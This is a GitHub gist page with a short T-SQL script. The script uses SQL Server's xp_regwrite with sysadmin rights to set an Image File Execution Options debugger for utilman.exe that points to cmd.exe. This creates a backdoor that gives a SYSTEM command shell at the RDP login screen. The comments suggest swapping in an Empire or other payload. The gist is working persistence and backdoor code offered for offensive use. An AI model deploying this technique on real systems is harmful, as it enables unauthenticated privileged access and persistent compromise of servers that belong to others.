Last active
September 16, 2019 04:58
-
-
Save nullbind/9d7838a86e85208a127f47bd67414769 to your computer and use it in GitHub Desktop.
run defined debugger instead of intended command
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| -- This will create a registry key through SQL Server (as sysadmin) | |
| -- to run a defined debugger (any command) instead of intended command | |
| -- in the example utilman.exe can be replace with cmd.exe and executed on demand via rdp | |
| --- note: this could easily be a empire/other payload | |
| EXEC master..xp_regwrite | |
| @rootkey = 'HKEY_LOCAL_MACHINE', | |
| @key = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe', | |
| @value_name = 'Debugger', | |
| @type = 'REG_SZ', | |
| @value = '"c:\windows\system32\cmd.exe"' |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment